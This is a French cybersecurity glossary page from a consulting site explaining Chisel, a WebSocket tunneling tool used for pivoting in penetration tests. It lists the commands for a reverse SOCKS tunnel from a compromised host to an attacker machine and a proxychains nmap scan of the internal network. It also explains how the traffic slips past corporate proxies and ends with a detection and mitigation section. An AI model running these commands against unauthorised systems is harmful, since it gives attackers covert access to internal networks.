Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Chisel Pivoting

hacking

Définition

Chisel est un outil de tunneling TCP/UDP rapide écrit en Go, utilisant le protocole WebSocket sur HTTP/HTTPS pour créer des tunnels réseau. En contexte de pentest, il est utilisé pour le pivoting : créer des tunnels qui permettent d'accéder à des réseaux internes inaccessibles directement, en passant par un système compromis qui agit comme relay. L'architecture de Chisel est client-serveur : le serveur s'exécute sur la machine de l'attaquant et le client s'exécute sur le pivot (système compromis). La connexion peut être initiée dans les deux sens : le mode standard (client sur le pivot se connecte au serveur de l'attaquant) ou le mode reverse (le serveur écoute sur le pivot et le client sur la machine de l'attaquant se connecte). Le mode reverse est particulièrement utile quand le pivot n'est pas directement joignable depuis la machine de l'attaquant. Chisel supporte la création de proxies SOCKS5 : chisel server -p 8080 --reverse (attaquant) + chisel client attaquant:8080 R:socks (pivot) crée un proxy SOCKS5 inverse sur le port 1080 de l'attaquant. Avec proxychains configuré pour utiliser ce proxy (socks5 127.0.0.1 1080), tous les outils de l'attaquant peuvent utiliser le proxy pour accéder au réseau interne. Le transport WebSocket sur HTTP/HTTPS de Chisel est son principal avantage : dans des environnements où seul le trafic web est autorisé en sortie (proxy HTTP d'entreprise), Chisel peut traverser ce proxy si les WebSockets sont autorisés. L'utilisation de HTTPS rend le tunnel indistinguable du trafic HTTPS normal pour les inspections superficielles. Comparé à Ligolo-ng (qui crée une interface réseau virtuelle), Chisel est plus léger et plus discret mais nécessite proxychains pour router les outils, ne supporte pas ICMP, et peut avoir des performances inférieures sur des connexions à haute latence.

Fonctionnement

Mode reverse SOCKS (le cas le plus commun en pentest) : attaquant lance chisel server --reverse -p 8080, pivot exécute chisel client attaquant:8080 R:socks. Le proxy SOCKS5 est disponible sur 127.0.0.1:1080 de l'attaquant. proxychains.conf : socks5 127.0.0.1 1080. Ensuite : proxychains nmap -sT -p 22,80,443,8080 10.10.10.0/24 scanne le réseau interne via le pivot.

Exploitation offensive

Chisel est particulièrement efficace dans les environnements avec proxy HTTP d'entreprise (WebSocket autorisé) où d'autres méthodes de tunneling (SSH, netcat) sont bloquées. Sa capacité à opérer sur des ports communs (80, 443, 8080) et son trafic ressemblant à du WebSocket HTTP légitime le rendent difficile à bloquer sans couper le trafic web légitime.

Détection et mitigation

Le trafic Chisel génère des connexions WebSocket longue durée vers des serveurs externes, souvent sur des ports web standards. L'analyse du trafic WebSocket (fréquence des frames, volumes, comportements de keepalive) peut révéler des connexions Chisel. Un pare-feu avec inspection applicative (Layer 7) peut identifier et bloquer les connexions Chisel basé sur leurs patterns de frames WebSocket.

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis